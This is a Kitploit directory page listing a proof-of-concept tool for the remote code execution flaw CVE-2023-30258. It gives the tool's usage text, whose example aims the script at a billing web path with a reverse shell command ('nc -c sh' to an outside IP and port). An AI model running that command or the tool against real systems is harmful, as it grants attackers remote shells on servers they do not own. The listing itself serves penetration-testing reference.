Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-30258-RCE-POC — POC for CVE-2023-30258-RCE by n0o0b | Kitploit
Tools/GitHubGitHub/n00o00b/cve-2023-30258-rce-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubn00o00b/cve-2023-30258-rce-poc

CVE-2023-30258-RCE-POC

POC for CVE-2023-30258-RCE by n0o0b

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-30258-RCE-POC

POC for CVE-2023-30258-RCE by n0o0b

Usage

root@kitploit:~
usage: poc.py [-h] [-u URL] [-c CMD]

example. python poc.py -u http://10.10.69.34/mbilling --cmd "nc -c sh 10.21.126.163 8888"

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  Target URL
  -c CMD, --cmd CMD  Command to execute
Download Tool